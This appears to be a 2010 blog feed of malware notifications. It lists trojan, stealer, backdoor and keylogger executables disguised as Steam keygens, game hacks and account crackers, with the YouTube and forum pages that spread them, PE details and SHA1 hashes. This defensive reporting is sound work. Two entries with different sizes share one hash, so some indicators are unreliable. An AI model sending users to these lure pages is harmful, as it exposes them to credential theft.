  • Localisation: http://www.youtube.com/watch?v=IspFO4B3Sr8
  • Original Name: Unknown
  • File Type : Exe, Size : 446464 (06D000h) Byte(s)
  • Packer: Unknown
  • EP: 000646CE
  • EP Offset: 000636CE
  • EP Section: .text
  • Linker: 8.0
  • Info additionnel: Stealer, crypted, original.txt, original.exe
  • SHA1: 79ee1c2ada8889ef9607d9912d77330451e951fa

[Xylibox] Malware notification 2010/04/04 - File Name: Facebook Cracker.exe
  • Localisation: http://www.youtube.com/watch?v=L1C835eUuXU
  • Original Name: Unknown
  • File Type : Exe, Size : 292376 (047618h) Byte(s)
  • Packer: Unknown
  • EP: 00004AEE
  • EP Offset: 00002EEE
  • EP Section: .text
  • Linker: 8.0
  • Info additionnel: Trojan, crypted, RFile1.exe, RFile2.exe
  • SHA1: 7be8d1d6a4090837e67eb63e5bf4e6f16b29c3b2

[Xylibox] Malware notification 2010/04/04 - File Name: RuneScape Hack v2.0.exe
  • Localisation: http://www.youtube.com/watch?v=yHNYlzkAzr8
  • Original Name: Unknown
  • File Type : Exe, Size : 316416 (04D400h) Byte(s)
  • Packer: Unknown
  • EP: 0000BBF4
  • EP Offset: 0000AFF4
  • EP Section: CODE
  • Linker: 2.25
  • Info additionnel: Stealer
  • SHA1: 7be8d1d6a4090837e67eb63e5bf4e6f16b29c3b2
  • Highslide JS

[Xylibox] Malware notification 2010/04/04 - File Name: (2) faceboook.exe
  • Localisation: http://www.youtube.com/watch?v=DBlcSvvmAIg
  • Original Name: Unknown
  • File Type : Exe, Size : 191878 (02ED86h) Byte(s)
  • Packer: WinRAR SFX Archive
  • EP: 0000A7D8
  • EP Offset: 00009BD8
  • EP Section: .text
  • Linker: 9.0
  • Info additionnel: Trojan, SFX silent mode, f.exe
  • SHA1: 90cfe4d251c519a2dacb8a775ec1f039046ac29f

[Xylibox] Malware notification 2010/04/03 - File Name: keygen.exe
  • Localisation: http://www.youtube.com/watch?v=Apro919wsTA
  • Original Name: Unknown
  • File Type : Exe, Size : 16896 (04200h) Byte(s)
  • Packer: Unknown
  • EP: 000039FA
  • EP Offset: 00002DFA
  • EP Section: .text
  • Linker: 7.10
  • Info additionnel: Trojan
  • SHA1: 49bc0e4aa29eaa65580272f99c601e432a426d45
    [Xylibox] SHA-1 Similarity found: Malware notification 2010/03/30 - File Name: keygen.exe
  • Highslide JS

[Xylibox] Malware notification 2010/04/03 - File Name: CoD-Mw2.exe
  • Localisation: http://www.youtube.com/watch?v=5z0OwaPl9bc
  • Original Name: PumpkinZ.exe
  • File Type : Exe, Size : 2318336 (0236000h) Byte(s)
  • Packer: Unknown
  • EP: 00001834
  • EP Offset: 00001834
  • EP Section: .text
  • Linker: 6.0
  • Info additionnel: Backdoor, n.exe
  • SHA1: 3de4c6474af655c5ab6a95d7560bff50e7d31188

[Xylibox] Malware notification 2010/04/03 - File Name: css_keygen.exe
  • Localisation: http://www.youtube.com/watch?v=4Wl2EJyw6E0
  • Original Name: css_keygen.exe
  • File Type : Exe, Size : 95744 (017600h) Byte(s)
  • Packer: Unknown
  • EP: 00018CBE
  • EP Offset: 00016EBE
  • EP Section: .text
  • Linker: 8.0
  • Info additionnel: Stealer
  • SHA1: 1780985e6e7c2650a4073aa1a49030ee5fecc7dc
  • Highslide JS Highslide JS Highslide JS Highslide JS

[Xylibox] Malware notification 2010/04/03 - File Name: MSN_Hacker_Privat.exe
  • Localisation: http://www.youtube.com/watch?v=LmywM9ONweU
  • Original Name: Unknown
  • File Type : Exe, Size : 142644 (022D34h) Byte(s)
  • Packer: Unknown
  • EP: 00001130
  • EP Offset: 00001130
  • EP Section: 
  • Linker: 6.0
  • Info additionnel: Trojan Horse
  • SHA1: 567cbecc2ec0dc9ad0c881a761b1cc38a5a6602d

[Xylibox] Malware notification 2010/04/02 - File Name: -Hacktool- Provided By Hamoortal.exe
  • Localisation: http://www.youtube.com/watch?v=g549qSx1lOI
  • Original Name: Unknown
  • File Type : Exe, Size : 1385688 (01524D8h) Byte(s)
  • Packer: UPX modded + WinRAR SFX Archive*
  • EP: 0003EF40
  • EP Offset: 0000B340
  • EP Section: UPX1
  • Linker: 5.0
  • Info additionnel: Trojan, Packed,SFX (Silent mode): make 1.exe, 2.exe at C:\
  • SHA1: 8ad6137ab38dd4d8a840e582be50cbc0f0ed7f7f

[Xylibox] Malware notification 2010/04/01 - File Name: UltimateCodes.exe
  • Localisation: http://www.youtube.com/watch?v=twITAWYZT64
  • Original Name: Unknown
  • File Type : Exe, Size : 93696 (016E00h) Byte(s)
  • Packer: Unknown
  • EP: 00001C83
  • EP Offset: 00001083
  • EP Section: .text
  • Linker: 8.0
  • Info additionnel: Trojan, Packed
  • SHA1: ae667b8decb585255f611b31d17d8ce3d0441757

[Xylibox] Malware notification 2010/04/01 - File Name: LightPower.exe
  • Localisation: http://www.youtube.com/watch?v=iLzLSvNc4KU
  • Original Name: LightPower.exe
  • File Type : Exe, Size : 157184 (026600h) Byte(s)
  • Packer: Unknown
  • EP: 0002747E
  • EP Offset: 0002567E
  • EP Section: .text
  • Linker: 8.0
  • Info additionnel: Social engineering Manipulation, exe Clean
  • SHA1: 904757452254c553da6a55976a80cc267d9f37a7
  • Highslide JS Highslide JS Highslide JS

[Xylibox] Malware notification 2010/04/01 - File Name: UltimateHack.exe
  • Localisation: http://www.youtube.com/watch?v=_97qjcH4u1U
  • Original Name: Stub_d.exe
  • File Type : Exe, Size : 144028 (02329Ch) Byte(s)
  • Packer: Unknown
  • EP: 00014DFE
  • EP Offset: 000131FE
  • EP Section: .text
  • Linker: 8.0
  • Info additionnel: Trojan Dropper
  • SHA1: fc2b8da1cbdedf27cd0b28693f1601f9c9b4b2af
  • Highslide JS

[Xylibox] Malware notification 2010/04/01 - File Name: Crack.exe
  • Localisation: http://www.youtube.com/watch?v=BheJrZGvYLA
  • Original Name: Unknown
  • File Type : Exe, Size : 9781434 (09540BAh) Byte(s)
  • Packer: WinRAR SFX Archive*
  • EP: 00001000
  • EP Offset: 00000600
  • EP Section: .text
  • Linker: 5.0
  • Info additionnel: Stealer
  • SHA1: 840f2e356014828afc0f6b2b8ac0633a2635516d

[Xylibox] Malware notification 2010/04/01 - File Name: Workin Steam keygen.exe
  • Localisation: http://www.youtube.com/watch?v=yjc63XhKZY0
  • Original Name: Unknown
  • File Type : Exe, Size : 746086 (0B6266h) Byte(s)
  • Packer: Unknown
  • EP: 00014470
  • EP Offset: 00014470
  • EP Section: .text
  • Linker: 8.0
  • Info additionnel: Stealer
  • SHA1: d86eabef366b51d0d7c7f30e07769386962e6472
  • Highslide JS Highslide JS Highslide JS

[Xylibox] Malware notification 2010/03/30 - File Name: Steam Keygen.exe
  • Localisation: http://www.youtube.com/watch?v=gjNuD6EU2Nc
  • Original Name: Unknown
  • File Type : Exe, Size : 388096 (05EC00h) Byte(s)
  • Packer: Unknown
  • EP: 000059AC
  • EP Offset: 00004DAC
  • EP Section: .text
  • Linker: 8.0
  • Info additionnel: Stealer
  • SHA1: b1682a331cb20b4415435dc6e7487c14d222d1e0
  • Highslide JS

[Xylibox] Malware notification 2010/03/30 - File Name: Steam Keygen.exe
  • Localisation: http://www.youtube.com/watch?v=efy2yfFlEMA
  • Original Name: Unknown
  • File Type : Exe, Size : 141312 (022800h) Byte(s)
  • Packer: Unknown
  • EP: 00004A84
  • EP Offset: 00003E84
  • EP Section: .text
  • Linker: 6.0
  • Info additionnel: Trojan Horse
  • SHA1: 0fb6b3b8fa846fa836bcd8c365f199d3b665376f

[Xylibox] Malware notification 2010/03/30 - File Name: SteamKeygen.exe
  • Localisation: http://www.youtube.com/watch?v=kt67C8VpIwI
  • Original Name: Unknown
  • File Type : Exe, Size : 1683856 (019B190h) Byte(s)
  • Packer: Unknown
  • EP: 00001B68
  • EP Offset: 00001B68
  • EP Section: .text
  • Linker: 6.0
  • Info additionnel: Stealer
  • SHA1: 1f0a5e21cbe1fb997edfe7a32d8d13f7ed66161b
  • Highslide JS Highslide JS

[Xylibox] Malware notification 2010/03/30 - File Name: keygen.exe
  • Localisation: http://www.youtube.com/watch?v=NusPK9HleOg
  • Original Name: Unknown
  • File Type : Exe, Size : 16896 (04200h) Byte(s)
  • Packer: Unknown
  • EP: 000039FA
  • EP Offset: 00002DFA
  • EP Section: .text
  • Linker: 7.10
  • Info additionnel: Trojan
  • SHA1: 49bc0e4aa29eaa65580272f99c601e432a426d45
  • Highslide JS

[Xylibox] Malware notification 2010/03/29 - File Name: Program.exe
  • Localisation: http://www.youtube.com/watch?v=aKvfgfhKpcA
  • Original Name: zx1l23112@!#!@#.exe
  • File Type : Exe, Size : 189620 (02E4B4h) Byte(s)
  • Packer: Unknown
  • EP: 0000539E
  • EP Offset: 0000379E
  • EP Section: .text
  • Linker: 8.0
  • Info additionnel: Trojan Dropper, Crypted
  • SHA1: c9558f955f4f0d79836977098081f428d4f36c5d

[Xylibox] Malware notification 2010/03/29 - File Name: L4D2 Hack Working!.exe
  • Localisation: Unknown
  • Original Name: JStub.exe
  • File Type : Exe, Size : 777760 (0BDE20h) Byte(s)
  • Packer: Unknown
  • EP: 000060BE
  • EP Offset: 000044BE
  • EP Section: .text
  • Linker: 8.0
  • Info additionnel: Keylogger
  • SHA1: b38cacb8875d3f86b116f65c8763264594aca592

[Xylibox] Malware notification 2010/03/29 - File Name: KeyGen.exe
  • Localisation: Unknown
  • Original Name: Unknown
  • File Type : Exe, Size : 303104 (04A000h) Byte(s)
  • Packer: Unknown
  • EP: 00001108
  • EP Offset: 00001108
  • EP Section: .text
  • Linker: 6.0
  • Info additionnel: Trojan Dropper
  • SHA1: ca85648e0fc01d0830656c8429af96f3760ce805

[Xylibox] Malware notification 2010/03/29 - File Name: Steam Keygen!.exe
  • Localisation: http://www.youtube.com/watch?v=kRaXrx1iK9k
  • Original Name: TeamViewer.exe
  • File Type : Exe, Size : 618527 (09701Fh) Byte(s)
  • Packer: Unknown
  • EP: 00009A98
  • EP Offset: 00007C98
  • EP Section: .rsrc
  • Linker: 8.0
  • Info additionnel: CabineStub.exe, Backdoor
  • SHA1: 97b64072330846910fb35201e54ad6a2effd16cc
  • Highslide JS

[Xylibox] Malware notification 2010/03/28 - File Name: Steam Account Cracker v2.exe
  • Localisation: http://www.youtube.com/watch?v=63Amk3QhXMA
  • Original Name: yorl.dll
  • File Type : Exe, Size : 1226859 (012B86Bh) Byte(s)
  • Packer: Unknown
  • EP: 000048E0
  • EP Offset: 000048E0
  • EP Section: .text
  • Linker: 6.0
  • Info additionnel: Backdoor
  • SHA1: 5a7b461499fe63dfccce2b4b08299c68d343d1b2
  • Highslide JS Highslide JS

[Xylibox] Malware notification 2010/03/28 - File Name: OopsCrasher1.5.exe
  • Localisation: http://forum.wawa-mania.ws/viewtopic.php?id=403485
  • Original Name: Unknown
  • File Type : Exe, Size : 287232 (046200h) Byte(s)
  • Packer: UPX 0.89.6 - 1.02 / 1.05 - 2.90 -> Markus & Laszlo
  • EP: 00056710
  • EP Offset: 00045B10
  • EP Section: UPX1
  • Linker: 2.25
  • Info additionnel: Stealer
  • SHA1: 0d5e3ce22a527319b3272efd145191e001da1244
  • Highslide JS Highslide JS